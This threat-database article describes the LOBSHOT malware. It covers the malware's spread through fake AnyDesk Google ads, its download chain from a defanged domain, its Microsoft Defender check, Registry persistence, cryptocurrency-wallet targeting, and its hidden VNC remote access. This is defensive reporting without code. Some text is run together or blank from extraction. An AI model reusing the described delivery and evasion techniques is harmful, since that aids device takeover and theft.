Threat Database Malware LOBSHOT Malware


A new malware threat called LOBSHOT has been found to be distributed through Google Ads and is capable of infecting Windows devices using hVNC. The malware was observed by cybersecurity researchers being promoted by ads appearing to be for the legitimate AnyDesk remote management software. However, the malicious ads instead lead users to a fake website. This page, ',' pushes a malicious MSI file that, in turn, executes a PowerShell command. The goal is to download a DLL from download-cdn[.]com, a domain that has previously been associated with the cybercriminal activities of the TA505/Clop ransomware group.

The downloaded DLL file is the LOBSHOT malware and is saved in the C:\ProgramData folder, where it is executed by RunDLL32.exe. According to a report, which revealed details about LOBSHOT, the researchers have observed over 500 unique LOBSHOT samples since July 2022. The identified samples are typically compiled as 32-bit DLLs or 32-bit executables ranging between 93 KB to 124 KB. Once executed on the breached devices, LOBSHOT checks if Microsoft Defender is running and terminates its execution if detected.

Cybercriminals Exploit the Google Ads to Distribute Malware Threats

Cybersecurity experts have observed a substantial surge in the usage of Google ads by threat actors to spread malware through search results. The malicious advertising campaigns involved the imitation of various websites and legitimate software products, such as 7-ZIP, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus and several other applications.

Despite the impression of legitimacy given by the ads, the websites they redirect to are actually designed to disseminate malware, including GoziRedLineVidarCobalt Strike, SectoRAT,and the Royal Ransomware instead of providing genuine applications.

The LOBSHOT Malware Targets Cryptocurrency Extensions and Wallets

If LOBSHOT doesn't find signs of Microsoft Defender's presence, it will proceed with its threatening programming. The threat will automatically configure Registry entries to ensure its startup on every Windows boot. LOBSHOT will then collect and start transmitting system information, including all running processes, from the infected device. Additionally, the malware looks for the presence of 32 Chrome cryptocurrency wallet extensions, nine Edge wallet extensions, and 11 Firefox wallet extensions.

Upon detecting these extensions, the malware executes a file in the C:\ProgramData folder. However, researchers are uncertain whether the purpose of the file is to extract extension data or some other harmful action.

Although collecting cryptocurrency extensions is a common goal for malware, the LOBSHOT malware also has a hVNC module incorporated into its structure. This module enables threat actors to access an infected device remotely discreetly.

The LOBSHOT Malware Provides Remote Access to the Breached Devices

The ability to remotely control a Windows desktop computer without the victim's knowledge is made possible by the hVNC (hidden virtual network computing) module.

The malware known as LOBSHOT includes an hVNC module, which enables the threat actors to manipulate the hidden desktop as if they were physically present in front of it, using their keyboard and mouse.

Once the module is activated, the victim's machine begins transmitting screen captures of the hidden desktop to a listening client controlled by the attacker. The attacker can interact with the client by manipulating the keyboard, clicking buttons, and moving the mouse, giving them complete remote control of the device.

With full access granted by hVNC, the threat actors can carry out various activities, such as executing commands, stealing data, and deploying additional malware payloads.


Most Viewed